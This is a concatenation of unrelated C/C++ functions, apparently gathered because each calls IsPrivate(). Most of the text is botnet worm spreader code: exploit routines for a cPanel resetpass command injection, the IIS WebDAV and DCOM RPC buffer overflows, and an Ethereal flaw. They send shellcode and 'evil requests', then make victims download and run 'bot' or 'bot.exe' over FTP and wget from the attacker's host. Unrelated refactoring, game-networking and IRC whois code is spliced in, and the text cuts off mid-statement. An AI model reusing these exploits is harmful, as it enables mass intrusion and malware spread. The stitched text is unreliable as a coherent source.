bool CScannerCPanel::Exploit() { bool bRetVal=false; CString sSendBuf, sCmdBuf; CString sHost(m_sSocket.m_szHost); unsigned short sPort=m_sSocket.m_sPort; // Can't infect a host from a firewalled system, cause it needs the FTP server if(IsPrivate(g_pMainCtrl->m_cIRC.m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost)) return false; // Connect to the server if(!m_sSocket.Connect(m_sSocket.m_szHost, m_sSocket.m_sPort)) return false; sCmdBuf.Format("echo${BLA}-e${BLA}open${BLA}%s${BLA}%d\\\\nuser${BLA}ftp${BLA}bla\\\\nget${BLA}bot\\\\nquit\\\\n${BLA}|${BLA}ftp${BLA}-n", g_pMainCtrl->m_cIRC.m_sLocalHost.CStr(), g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue); sSendBuf.Format("GET /resetpass/?user=%%7C%%60BLA=$'\\\\x20';BLA2=$'\\\\x2F';%s%%60%%7C HTTP/1.0\r\n\r\n", sCmdBuf.CStr()); m_sSocket.Write(sSendBuf.CStr(), sSendBuf.GetLength()); m_sSocket.Disconnect(); if(!m_sSocket.Connect(sHost.CStr(), sPort)) return false; sCmdBuf.Assign("./bot"); sSendBuf.Format("GET /resetpass/?user=%%7C%%60BLA=$'\\\\x20';BLA2=$'\\\\x2F';%s%%60%%7C HTTP/1.0\r\n\r\n", sCmdBuf.CStr()); m_sSocket.Write(sSendBuf.CStr(), sSendBuf.GetLength()); m_sSocket.Disconnect(); // Close the socket that was once funky fresh m_sSocket.Disconnect(); return bRetVal; }
bool CScannerHTTP::ExploitIISWebDav(int iHTTPType, unsigned short sRet) { char szSCBuf[4096]; char szShellBuf[4096]; char *szReqBuf=(char*)malloc(100000); unsigned short ret=sRet; int iShellSize=0, iPos=0, iSCSize=0, iReqSize=0, iNOPSize=100, rt=0, r=0; CString sURL; if(IsPrivate(g_pMainCtrl->m_pIRC->m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost)) sURL.Format("ftp://*****:*****@%s:%d/bot.exe", g_pMainCtrl->m_pIRC->m_sLocalHost.CStr(), \ g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue); else sURL.Format("ftp://*****:*****@%s:%d/bot.exe", inet_ntoa(to_in_addr(g_pMainCtrl->m_pIRC->m_lLocalAddr)), \ g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue); iShellSize=setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), sURL.Str(), false); // Build a buffer with the shellcode memset(szSCBuf+iPos, '\x90', iNOPSize ); iPos+=iNOPSize; memcpy(szSCBuf+iPos, szShellBuf, iShellSize ); iPos+=iShellSize; iSCSize=iPos; iPos=0; // Build the request memset(szReqBuf, 0, 100000); strcpy(szReqBuf, "SEARCH /"); unsigned int j, i=strlen(szReqBuf); szReqBuf[i]='\x90'; for(j=i+1; j<i+2150; j+=2) { *(unsigned short*)&szReqBuf[j]=(unsigned short)ret; } // EIP will be szReqBuf[8+2087] for(;j<i+65535-strlen(jumpcode);j++) szReqBuf[j]='\x90'; // The rest is padded with NOP's. RET address should point to this zone! memcpy(&szReqBuf[j], jumpcode, strlen(jumpcode)); // Then we skip the body of the HTTP request strcpy(szReqBuf+strlen(szReqBuf), " HTTP/1.1\r\n"); sprintf(szReqBuf+strlen(szReqBuf), "Host: %s\r\nContent-Type: text/xml\r\nContent-Length: %d\r\n\r\n", m_sSocket.m_szHost, strlen(body)+iShellSize); strcpy(szReqBuf+strlen(szReqBuf), body); memset(szReqBuf+strlen(szReqBuf), 0x01, 1); memset(szReqBuf+strlen(szReqBuf), 0x90, 3); strcpy(szReqBuf+strlen(szReqBuf), szSCBuf); iReqSize=strlen(szReqBuf); // Connect to the server if(!m_sSocket.Connect(m_sSocket.m_szHost, 80)) // Connect failed, exit { free(szReqBuf); return false; } // Send the evil request if(!m_sSocket.Write(szReqBuf, iReqSize)) { m_sSocket.Disconnect(); free(szReqBuf); return false; } // Read reply m_sSocket.RecvTO(szReqBuf, sizeof(szReqBuf), 5000); // Close the socket that was once funky fresh m_sSocket.Disconnect(); free(szReqBuf); return true; }
bool CScannerWebDav::Exploit() { char szSCBuf[4096]; char szShellBuf[4096]; char *szReqBuf=(char*)malloc(100000); unsigned short ret=0xB102; int iShellSize=0, iPos=0, iSCSize=0, iReqSize=0, iNOPSize=100, rt=0, r=0; if(IsPrivate(g_pMainCtrl->m_cIRC.m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost)) iShellSize=setup_shellcode(webdav_shellcode, sizeof(webdav_shellcode), szShellBuf, sizeof(szShellBuf), \ g_pMainCtrl->m_cBot.bot_ftrans_port.iValue, inet_addr(g_pMainCtrl->m_cIRC.m_sLocalHost.CStr()), \ WEBDAV_SHELLCODE_OFFSET_PORT, WEBDAV_SHELLCODE_OFFSET_IP, WebDavConfigSC); else iShellSize=setup_shellcode(webdav_shellcode, sizeof(webdav_shellcode), szShellBuf, sizeof(szShellBuf), \ g_pMainCtrl->m_cBot.bot_ftrans_port.iValue, g_pMainCtrl->m_cIRC.m_lLocalAddr, \ WEBDAV_SHELLCODE_OFFSET_PORT, WEBDAV_SHELLCODE_OFFSET_IP, WebDavConfigSC); // Build a buffer with the shellcode memset(szSCBuf+iPos, '\x90', iNOPSize ); iPos+=iNOPSize; memcpy(szSCBuf+iPos, szShellBuf, iShellSize ); iPos+=iShellSize; iSCSize=iPos; iPos=0; // Build the request memset(szReqBuf, 0, 100000); strcpy(szReqBuf, "SEARCH /"); int j, i=strlen(szReqBuf); szReqBuf[i]='\x90'; for(j=i+1; j<i+2150; j+=2) { memcpy(szReqBuf+j, &ret, 2); iPos+=2; } // EIP will be buffer[8+2087] for(;j<i+65535-strlen(jumpcode);j++) szReqBuf[j]='\x90'; // The rest is padded with NOP's. RET address should point to this zone! memcpy(szReqBuf+j, jumpcode, strlen(jumpcode)); // Then we skip the body of the HTTP request strcat(szReqBuf, " HTTP/1.1\r\n"); sprintf(szReqBuf+strlen(szReqBuf), "Host: %s\r\nContent-Type: text/xml\r\nContent-Length: %d\r\n\r\n", m_sSocket.m_szHost, strlen(body)+iShellSize); strcat(szReqBuf, body); memset(szReqBuf+strlen(szReqBuf), 0x01, 1); memset(szReqBuf+strlen(szReqBuf), 0x90, 3); memcpy(szReqBuf+strlen(szReqBuf), szSCBuf, iSCSize); iReqSize=strlen(szReqBuf); // Connect to the server if(!m_sSocket.Connect(m_sSocket.m_szHost, 80)) // Connect failed, exit { free(szReqBuf); return false; } // Send the evil request if(!m_sSocket.Write(szReqBuf, iReqSize)) { m_sSocket.Disconnect(); free(szReqBuf); return false; } // Read reply m_sSocket.RecvTO(szReqBuf, sizeof(szReqBuf), 5000); // Close the socket that was once funky fresh m_sSocket.Disconnect(); free(szReqBuf); return true; }
bool CScannerEthereal::Exploit() { if(!IsPrivate(g_pMainCtrl->m_pIRC->m_sLocalIp.CStr()) && IsPrivate(m_sSocket.m_szHost)) return false; // We need root to exploit this cause we need to spoof packets if(getuid()) return false; ExploitInt(0); ExploitInt(1); ExploitInt(2); ExploitInt(3); CSocket sShellSocket; if(sShellSocket.Connect(m_sSocket.m_szHost, 31337)) { CString sCmdBuf; sShellSocket.RecvTO(sCmdBuf.GetBuffer(8192), 8192, 2000); sCmdBuf.Format("echo -e open %s %d\\nuser ftp bla\\nget bot\\nquit\\n | ftp -n\n", g_pMainCtrl->m_pIRC->m_sLocalHost.CStr(), g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue); sShellSocket.Write(sCmdBuf.CStr(), sCmdBuf.GetLength()); sShellSocket.Recv(sCmdBuf.GetBuffer(8192), 8192); sCmdBuf.Format("wget ftp://bla:bla@%s:%d/bot\n", g_pMainCtrl->m_pIRC->m_sLocalHost.CStr(), g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue); sShellSocket.Write(sCmdBuf.CStr(), sCmdBuf.GetLength()); sShellSocket.Recv(sCmdBuf.GetBuffer(8192), 8192); sCmdBuf.Assign("chmod 777 ./bot ; ./bla\n"); sShellSocket.Write(sCmdBuf.CStr(), sCmdBuf.GetLength()); sShellSocket.Recv(sCmdBuf.GetBuffer(8192), 8192); sShellSocket.Disconnect(); return true; } else return false; }
string CEntityInfo::getRenameCommand(symbolPtr* pSym,string newname) { string command; string selectTag = prepareQuery(etag(pSym)); string permissionCode = "1"; if(IsPublic(pSym)) permissionCode = "0"; else if(IsProtected(pSym)) permissionCode = "2"; else if(IsPrivate(pSym)) permissionCode = "3"; switch(pSym->get_kind()) { case DD_MODULE: command="Impact:ChangeFilename " + selectTag + " {" + newname + "}"; break; case DD_INTERFACE: case DD_CLASS: command = "Impact:ChangeClassname " + selectTag + " {" + newname + "}"; break; case DD_ENUM: case DD_UNION: command = "Impact:ChangeUnionEnumStructName " + selectTag + " {" + newname + "}"; break; case DD_FIELD: command = "Impact:ChangeFieldName " + selectTag + " {" + newname + "} " + permissionCode; break; case DD_FUNC_DECL: command = "Impact:ChangeFunctionName " + selectTag + " {" + newname + "}"; break; case DD_TYPEDEF: command = "Impact:ChangeTypedefName " + selectTag + " {" + newname + "}"; break; case DD_MACRO: command = "Impact:ChangeMacroName " + selectTag + " {" + newname + "}"; break; case DD_TEMPLATE: command = "Impact:ChangeTemplateName " + selectTag + " {" + newname + "}"; break; case DD_VAR_DECL: command = "Impact:ChangeVariableName " + selectTag + " {" + newname + "}"; break; case DD_PACKAGE: command ="Impact:RenamePackage " + selectTag + " { " + newname + "}"; } return command; }
bool C4Network2Client::DoConnectAttempt(C4Network2IO *pIO) { // local? if (isLocal()) { iNextConnAttempt = 0; return true; } // msg and data connected? Nothing to do if (getMsgConn() != getDataConn()) { iNextConnAttempt = time(nullptr) + 10; return true; } // too early? if (iNextConnAttempt && iNextConnAttempt > time(nullptr)) return true; // find address to try int32_t iBestAddress = -1; for (int32_t i = 0; i < iAddrCnt; i++) // no connection for this protocol? if ((!pDataConn || Addr[i].getProtocol() != pDataConn->getProtocol()) && (!pMsgConn || Addr[i].getProtocol() != pMsgConn->getProtocol())) // protocol available? if (pIO->getNetIO(Addr[i].getProtocol())) // new best address? if (iBestAddress < 0 || AddrAttempts[i] < AddrAttempts[iBestAddress]) iBestAddress = i; // too many attempts or nothing found? if (iBestAddress < 0 || AddrAttempts[iBestAddress] > C4NetClientConnectAttempts) { iNextConnAttempt = time(nullptr) + 10; return true; } // save attempt AddrAttempts[iBestAddress]++; iNextConnAttempt = time(nullptr) + C4NetClientConnectInterval; auto addr = Addr[iBestAddress].getAddr(); // try TCP simultaneous open if the stars align right if (addr.GetFamily() == C4NetIO::addr_t::IPv6 && // address needs to be IPv6... !addr.IsLocal() && !addr.IsPrivate() && // ...global unicast... Addr[iBestAddress].getProtocol() == P_TCP && // ...TCP, !TcpSimOpenSocket && // there is no previous request, pParent->GetLocal()->getID() < getID()) // and make sure that only one client per pair initiates a request. { DoTCPSimultaneousOpen(pIO, C4Network2Address()); } std::set<int> interfaceIDs; if (addr.IsLocal()) interfaceIDs = Network.Clients.GetLocal()->getInterfaceIDs(); else interfaceIDs = {0}; for (auto id : interfaceIDs) { addr.SetScopeId(id); // log LogSilentF("Network: connecting client %s on %s...", getName(), addr.ToString().getData()); // connect if (pIO->Connect(addr, Addr[iBestAddress].getProtocol(), pClient->getCore())) return true; } return false; }
JBoolean CBCClass::IsInherited ( const JIndex index, const InheritType inherit, FnAccessLevel* access ) const { const JString& fnName = GetFunctionName(index); *access = GetFnAccessLevel(index); if (!IsPrivate(*access) && // private fnName.GetFirstCharacter() != '~' && // dtor fnName != GetName()) // ctor { if (inherit == kInheritPrivate) { if (*access == kPublicAccess || *access == kProtectedAccess) { *access = kPrivateAccess; } else if (*access == kQtPublicSlotAccess || *access == kQtProtectedSlotAccess) { *access = kQtPrivateSlotAccess; } } else if (inherit == kInheritProtected && *access == kPublicAccess) { *access = kProtectedAccess; } else if (inherit == kInheritProtected && *access == kQtPublicSlotAccess) { *access = kQtProtectedSlotAccess; } return kJTrue; } else { return kJFalse; } }
bool CEntityInfo::IsPublic(symbolPtr* pSym) { return !(IsProtected(pSym) || IsPrivate(pSym)); }
bool CScannerDCOM2::Exploit() { char szRecvBuf[4096], szSCBuf[4096], szLoadBuf[4096], szReqBuf[4096], szShellBuf[4096], szLoaderBuf[4096]; int iShellSize=0, iLoaderSize=0, iPos=0, iSCSize=0, iLoadSize=0, iReqSize=0; char *pTemp; int iHostOS=FpHost(m_sSocket.m_szHost, FP_RPC); if(iHostOS==OS_UNKNOWN || iHostOS==OS_WINNT) return false; CString sURL; if(IsPrivate(g_pMainCtrl->m_pIRC->m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost)) sURL.Format("ftp://*****:*****@%s:%d/bot.exe", g_pMainCtrl->m_pIRC->m_sLocalHost.CStr(), \ g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue); else sURL.Format("ftp://*****:*****@%s:%d/bot.exe", inet_ntoa(to_in_addr(g_pMainCtrl->m_pIRC->m_lLocalAddr)), \ g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue); iShellSize=setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), sURL.Str(), false); iLoaderSize=encrypt_shellcode(dcom2_loader, sizeof(dcom2_loader), szLoaderBuf, sizeof(szLoaderBuf), NULL); memcpy(szLoadBuf+iPos, dcom2_shellcode_buf, sizeof(dcom2_shellcode_buf) ); iPos+=sizeof(dcom2_shellcode_buf); memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_SC, szLoaderBuf, iLoaderSize ); memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_SC, dcom2_shellcode_adduser,sizeof(dcom2_shellcode_adduser) ); memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_JMP_ADDR, &dcom2_my_offsets[0].lJmpAddr, 4 ); memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_TOP_SEH, &dcom2_my_offsets[0].lTopSEH, 4 ); iLoadSize=iPos; iPos=0; // Build the request memcpy(szReqBuf+iPos, dcom2_request1, sizeof(dcom2_request1)-1 ); iPos+=sizeof(dcom2_request1)-1; memcpy(szReqBuf+iPos, dcom2_request2, sizeof(dcom2_request2)-1 ); iPos+=sizeof(dcom2_request2)-1; memcpy(szReqBuf+iPos, szLoadBuf, iLoadSize ); iPos+=iLoadSize; memcpy(szReqBuf+iPos, dcom2_request3, sizeof(dcom2_request3)-1 ); iPos+=sizeof(dcom2_request3)-1; memcpy(szReqBuf+iPos, dcom2_request4, sizeof(dcom2_request4)-1 ); iPos+=sizeof(dcom2_request4)-1; iReqSize=iPos; iPos=0; pTemp=szReqBuf+sizeof(dcom2_request1)-1; // Fill the request with the right sizes *(unsigned long*)(pTemp) = *(unsigned long*)(pTemp) + iLoadSize / 2; *(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iLoadSize / 2; pTemp=szReqBuf; *(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iLoadSize - 12; *(unsigned long*)(pTemp+16) = *(unsigned long*)(pTemp+16) + iLoadSize - 12; *(unsigned long*)(pTemp+128) = *(unsigned long*)(pTemp+128) + iLoadSize - 12; *(unsigned long*)(pTemp+132) = *(unsigned long*)(pTemp+132) + iLoadSize - 12; *(unsigned long*)(pTemp+180) = *(unsigned long*)(pTemp+180) + iLoadSize - 12; *(unsigned long*)(pTemp+184) = *(unsigned long*)(pTemp+184) + iLoadSize - 12; *(unsigned long*)(pTemp+208) = *(unsigned long*)(pTemp+208) + iLoadSize - 12; *(unsigned long*)(pTemp+396) = *(unsigned long*)(pTemp+396) + iLoadSize - 12; char szAssocGroup[4]; // Connect to the server if(!m_sSocket.Connect(m_sSocket.m_szHost, m_sSocket.m_sPort)) // Connect failed, exit return false; // Send the bind string if(!m_sSocket.Write(dcom2_bindstr, sizeof(dcom2_bindstr)-1)) { m_sSocket.Disconnect(); return false; } // Read reply if(!m_sSocket.Recv(szRecvBuf, sizeof(szRecvBuf))) { m_sSocket.Disconnect(); return false; } // Check for DCE_PKT_BINDACK if(szRecvBuf[2]!=DCE_PKT_BINDACK) { m_sSocket.Disconnect(); return false; } // Store the association group for later usage memcpy(szAssocGroup, szRecvBuf+20, 4); // Send the evil request if(!m_sSocket.Write(szReqBuf, iReqSize)) { m_sSocket.Disconnect(); return false; } // Read reply if(!m_sSocket.Recv(szRecvBuf, sizeof(szRecvBuf))) { m_sSocket.Disconnect(); return false; } // Check for DCE_PKT_FAULT if(szRecvBuf[2]==DCE_PKT_FAULT) { m_sSocket.Disconnect(); return false; } // Close the socket that was once funky fresh m_sSocket.Disconnect(); return true; }
bool CScannerDCOM::Exploit() { switch(m_sSocket.m_sPort) { case 135: case 1025: { char szRecvBuf[4096]; char szSCBuf[4096]; char szReqBuf[4096]; char szShellBuf[4096]; int iShellSize=0, iPos=0, iSCSize=0, iReqSize=0, iNOPSize=sizeof(nops)-1; char *pTemp; int iHostOS=FpHost(m_sSocket.m_szHost, FP_RPC); if(iHostOS==OS_UNKNOWN) iHostOS=FpHost(m_sSocket.m_szHost, FP_SMB); if(iHostOS==OS_WINNT) return false; CString sURL; if(IsPrivate(g_pMainCtrl->m_cIRC.m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost)) sURL.Format("ftp://*****:*****@%s:%d/bot.exe", g_pMainCtrl->m_cIRC.m_sLocalHost.CStr(), \ g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue); else sURL.Format("ftp://*****:*****@%s:%d/bot.exe", inet_ntoa(to_in_addr(g_pMainCtrl->m_cIRC.m_lLocalAddr)), \ g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue); iShellSize=setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), sURL.Str(), false); // Build a buffer with the shellcode memcpy(szSCBuf+iPos, shellcode_start, sizeof(shellcode_start)-1 ); iPos+=sizeof(shellcode_start)-1; memset(szSCBuf+iPos, '\x90', iNOPSize ); iPos+=iNOPSize; memcpy(szSCBuf+iPos, szShellBuf, iShellSize ); iPos+=iShellSize; iSCSize=iPos; iPos=0; // Prepend NOPs as long as shellcode doesn't fit RPC packet format while(iSCSize%16!=12) { char *szTemp=(char*)malloc(iSCSize+1); iNOPSize++; memcpy(szSCBuf+iPos, shellcode_start, sizeof(shellcode_start)-1 ); iPos+=sizeof(shellcode_start)-1; memset(szSCBuf+iPos, '\x90', iNOPSize ); iPos+=iNOPSize; memcpy(szSCBuf+iPos, szShellBuf, iShellSize ); iPos+=iShellSize; iSCSize=iPos; iPos=0; free(szTemp); } // Set the return address if(iHostOS==OS_WINXP || iHostOS==OS_UNKNOWN) memcpy(szSCBuf+36, (char*)&my_offsets[1], 4); else memcpy(szSCBuf+36, (char*)&my_offsets[0], 4); // Build the request memcpy(szReqBuf+iPos, request1, sizeof(request1)-1 ); iPos+=sizeof(request1)-1; memcpy(szReqBuf+iPos, request2, sizeof(request2)-1 ); iPos+=sizeof(request2)-1; memcpy(szReqBuf+iPos, szSCBuf, iSCSize ); iPos+=iSCSize; memcpy(szReqBuf+iPos, request3, sizeof(request3)-1 ); iPos+=sizeof(request3)-1; memcpy(szReqBuf+iPos, request4, sizeof(request4)-1 ); iPos+=sizeof(request4)-1; iReqSize=iPos; pTemp=szReqBuf+sizeof(request1)-1; // Fill the request with the right sizes *(unsigned long*)(pTemp) = *(unsigned long*)(pTemp) + iSCSize / 2; *(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iSCSize / 2; pTemp=szReqBuf; *(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iSCSize - 12; *(unsigned long*)(pTemp+16) = *(unsigned long*)(pTemp+16) + iSCSize - 12; *(unsigned long*)(pTemp+128) = *(unsigned long*)(pTemp+128) + iSCSize - 12; *(unsigned long*)(pTemp+132) = *(unsigned long*)(pTemp+132) + iSCSize - 12; *(unsigned long*)(pTemp+180) = *(unsigned long*)(pTemp+180) + iSCSize - 12; *(unsigned long*)(pTemp+184) = *(unsigned long*)(pTemp+184) + iSCSize - 12; *(unsigned long*)(pTemp+208) = *(unsigned long*)(pTemp+208) + iSCSize - 12; *(unsigned long*)(pTemp+396) = *(unsigned long*)(pTemp+396) + iSCSize - 12; // Connect to the server if(!m_sSocket.Connect(m_sSocket.m_szHost, m_sSocket.m_sPort)) // Connect failed, exit return false; // Send the bind string if(!m_sSocket.Write(bindstr, sizeof(bindstr)-1)) { m_sSocket.Disconnect(); return false; } // Read reply m_sSocket.RecvTO(szRecvBuf, sizeof(szRecvBuf), 5000); // Send the evil request if(!m_sSocket.Write(szReqBuf, iReqSize)) { m_sSocket.Disconnect(); return false; } // Read reply if(!m_sSocket.RecvTO(szRecvBuf, sizeof(szRecvBuf), 5000)) { m_sSocket.Disconnect(); return false; } // Close the socket that was once funky fresh m_sSocket.Disconnect(); return true; } break; case 445: { #ifdef _WIN32 NETRESOURCEW nr; bool bRetVal=false; if(!ConnectViaNullSession(m_sSocket.m_szHost, &nr)) return bRetVal; else { int iHostOS=FpHost(m_sSocket.m_szHost, FP_NP); if(iHostOS==OS_UNKNOWN) iHostOS=FpHost(m_sSocket.m_szHost, FP_SMB); char szPipePath[MAX_PATH]; sprintf(szPipePath, "\\\\%s\\pipe\\epmapper", m_sSocket.m_szHost); HANDLE hFile=CreateFile(szPipePath, GENERIC_WRITE|GENERIC_READ, FILE_SHARE_READ, \ NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if(hFile!=INVALID_HANDLE_VALUE) { SendLocal("%s: connected to pipe \\\\%s\\pipe\\epmapper.", m_sScannerName.CStr(), m_sSocket.m_szHost); char szSCBuf[4096]; char szReqBuf[4096]; char szShellBuf[4096]; int iShellSize=0, iPos=0, iSCSize=0, iReqSize=0, iNOPSize=sizeof(nops)-1; char *pTemp; CString sURL; if(IsPrivate(g_pMainCtrl->m_cIRC.m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost)) sURL.Format("ftp://*****:*****@%s:%d/bot.exe", g_pMainCtrl->m_cIRC.m_sLocalHost.CStr(), \ g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue); else sURL.Format("ftp://*****:*****@%s:%d/bot.exe", inet_ntoa(to_in_addr(g_pMainCtrl->m_cIRC.m_lLocalAddr)), \ g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue); iShellSize=setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), sURL.Str(), false); // Build a buffer with the shellcode memcpy(szSCBuf+iPos, shellcode_start, sizeof(shellcode_start)-1 ); iPos+=sizeof(shellcode_start)-1; memset(szSCBuf+iPos, '\x90', iNOPSize ); iPos+=iNOPSize; memcpy(szSCBuf+iPos, szShellBuf, iShellSize ); iPos+=iShellSize; iSCSize=iPos; iPos=0; // Prepend NOPs as long as shellcode doesn't fit RPC packet format while(iSCSize%16!=12) { char *szTemp=(char*)malloc(iSCSize+1); iNOPSize++; memcpy(szSCBuf+iPos, shellcode_start, sizeof(shellcode_start)-1 ); iPos+=sizeof(shellcode_start)-1; memset(szSCBuf+iPos, '\x90', iNOPSize ); iPos+=iNOPSize; memcpy(szSCBuf+iPos, szShellBuf, iShellSize ); iPos+=iShellSize; iSCSize=iPos; iPos=0; free(szTemp); } // Set the return address if(iHostOS==OS_WINXP || iHostOS==OS_UNKNOWN) memcpy(szSCBuf+36, (char*)&my_offsets[1], 4); else memcpy(szSCBuf+36, (char*)&my_offsets[0], 4); // Build the request memcpy(szReqBuf+iPos, request1, sizeof(request1)-1 ); iPos+=sizeof(request1)-1; memcpy(szReqBuf+iPos, request2, sizeof(request2)-1 ); iPos+=sizeof(request2)-1; memcpy(szReqBuf+iPos, szSCBuf, iSCSize ); iPos+=iSCSize; memcpy(szReqBuf+iPos, request3, sizeof(request3)-1 ); iPos+=sizeof(request3)-1; memcpy(szReqBuf+iPos, request4, sizeof(request4)-1 ); iPos+=sizeof(request4)-1; iReqSize=iPos; pTemp=szReqBuf+sizeof(request1)-1; // Fill the request with the right sizes *(unsigned long*)(pTemp) = *(unsigned long*)(pTemp) + iSCSize / 2; *(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iSCSize / 2; pTemp=szReqBuf; *(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iSCSize - 12; *(unsigned long*)(pTemp+16) = *(unsigned long*)(pTemp+16) + iSCSize - 12; *(unsigned long*)(pTemp+128) = *(unsigned long*)(pTemp+128) + iSCSize - 12; *(unsigned long*)(pTemp+132) = *(unsigned long*)(pTemp+132) + iSCSize - 12; *(unsigned long*)(pTemp+180) = *(unsigned long*)(pTemp+180) + iSCSize - 12; *(unsigned long*)(pTemp+184) = *(unsigned long*)(pTemp+184) + iSCSize - 12; *(unsigned long*)(pTemp+208) = *(unsigned long*)(pTemp+208) + iSCSize - 12; *(unsigned long*)(pTemp+396) = *(unsigned long*)(pTemp+396) + iSCSize - 12; unsigned long lWritten; char *szInBuf=(char*)malloc(100000); memset(szInBuf, 0, 100000); // Send the bind string DWORD dwRead; TransactNamedPipe(hFile, bindstr, sizeof(bindstr)-1, szInBuf, 10000, &dwRead, NULL); if(szInBuf[2]!=0x0C) { CloseHandle(hFile); CloseNullSession(m_sSocket.m_szHost); return bRetVal; } // Send the evil request if(!WriteFile(hFile, szReqBuf, iReqSize, &lWritten, 0)) { CloseHandle(hFile); CloseNullSession(m_sSocket.m_szHost); return bRetVal; } if(!ReadFile(hFile, szInBuf, 10000, &dwRead, NULL)) bRetVal=true; else bRetVal=false; free(szInBuf); } CloseHandle(hFile); CloseNullSession(m_sSocket.m_szHost); } return bRetVal; #endif // _WIN32 } break; default: return false; break; } return false; }
/* ** m_whois ** parv[0] = sender prefix ** parv[1] = nickname masklist */ int m_whois(struct Client *cptr, struct Client *sptr, int parc, char *parv[]) { static anUser UnknownUser = { NULL, /* next */ NULL, /* channel */ NULL, /* invited */ NULL, /* silence */ NULL, /* away */ 0, /* last */ 1, /* refcount */ 0, /* joined */ "<Unknown>" /* server */ }; static char rpl_oper[] = "an IRC Operator"; static char rpl_locop[] = "an IRC Operator - Local IRC Operator"; static char rpl_sadmin[] = "an IRC Operator - Services Administrator"; static char rpl_admin[] = "an IRC Operator - Server Administrator"; static char rpl_tadmin[] = "an IRC Operator - Technical Administrator"; static char rpl_nadmin[] = "an IRC Operator - Network Administrator"; Link *lp; anUser *user; struct Client *acptr, *a2cptr; aChannel *chptr; char *nick, *name; /* char *tmp; */ char *p = NULL; int found, len, mlen; static time_t last_used=0L; char *nick_match=NULL, *user_match=NULL, *host_match=NULL, *server_match=NULL; char *name_match=NULL; int found_mode; int hits = 0; char *mename = me.name; if(sptr->user && sptr->user->vlink) mename = sptr->user->vlink->name; if (parc < 2) { sendto_one(sptr, form_str(ERR_NONICKNAMEGIVEN), mename, parv[0]); return 0; } if(parc > 2) { if (hunt_server(cptr,sptr,":%s WHOIS %s :%s", 1,parc,parv) != HUNTED_ISME) return 0; parv[1] = parv[2]; } if(!IsAnOper(sptr) && !MyConnect(sptr)) /* pace non local requests */ { if((last_used + WHOIS_WAIT) > CurrentTime) { /* Unfortunately, returning anything to a non local * request =might= increase sendq to be usable in a split hack * Sorry gang ;-( - Dianora */ return 0; } else { last_used = CurrentTime; } } /* Multiple whois from remote hosts, can be used * to flood a server off. One could argue that multiple whois on * local server could remain. Lets think about that, for now * removing it totally. * -Dianora */ /* for (tmp = parv[1]; (nick = strtoken(&p, tmp, ",")); tmp = NULL) */ nick = parv[1]; p = strchr(parv[1],','); if(p) *p = '\0'; { int invis, member, wilds; found = 0; (void)collapse(nick); wilds = (nick[0]=='$' || strchr(nick, '?') || strchr(nick, '*')); /* ** We're no longer allowing remote users to generate ** requests with wildcards. */ if (wilds && !IsAnOper(sptr)) { sendto_one(sptr, form_str(ERR_NOSUCHNICK), mename, parv[0], nick); return 0; } /* continue; */ /* If the nick doesn't have any wild cards in it, * then just pick it up from the hash table * - Dianora */ if(!wilds) { acptr = hash_find_client(nick,(struct Client *)NULL); if(!acptr) { sendto_one(sptr, form_str(ERR_NOSUCHNICK), mename, parv[0], nick); sendto_one(sptr, form_str(RPL_ENDOFWHOIS), mename, parv[0], parv[1]); return 0; /* continue; */ } if(IsStealth(acptr)) { sendto_one(sptr, form_str(ERR_NOSUCHNICK), mename, parv[0], nick); return 0; // Add by ^Stinger^ after the idea of Soldier (: } if(!IsPerson(acptr)) { sendto_one(sptr, form_str(RPL_ENDOFWHOIS), mename, parv[0], parv[1]); return 0; } /* continue; */ user = acptr->user ? acptr->user : &UnknownUser; name = (!*acptr->name) ? "?" : acptr->name; invis = IsInvisible(acptr); member = (user->channel) ? 1 : 0; a2cptr = find_server(user->server); sendto_one(sptr, form_str(RPL_WHOISUSER), mename, parv[0], name, acptr->username, acptr->host, acptr->info); if((IsOper(sptr) || (acptr == sptr)) && WhoisExtension) { sendto_one(sptr, form_str(RPL_WHOISREALHOST), mename, parv[0], name, acptr->realhost); } mlen = strlen(mename) + strlen(parv[0]) + 6 + strlen(name); *buf = '\0'; if (IsSsl(acptr)) { sendto_one(sptr, form_str(RPL_WHOISSECURE), mename, parv[0], parv[1]); } if(((!IsPrivate(acptr) || IsOper(sptr)) || (acptr==sptr)) && !IsStealth(acptr)) for (len = 0, *buf = '\0', lp = user->channel; lp; lp = lp->next) { chptr = lp->value.chptr; if (ShowChannel(sptr, chptr)) { if (len + strlen(chptr->chname) > (size_t) BUFSIZE - 4 - mlen) { sendto_one(sptr, ":%s %d %s %s :%s", mename, RPL_WHOISCHANNELS, parv[0], name, buf); *buf = '\0'; len = 0; } found_mode = user_channel_mode(acptr, chptr); #ifdef HIDE_OPS if(is_chan_op(sptr,chptr)) #endif { if(found_mode & 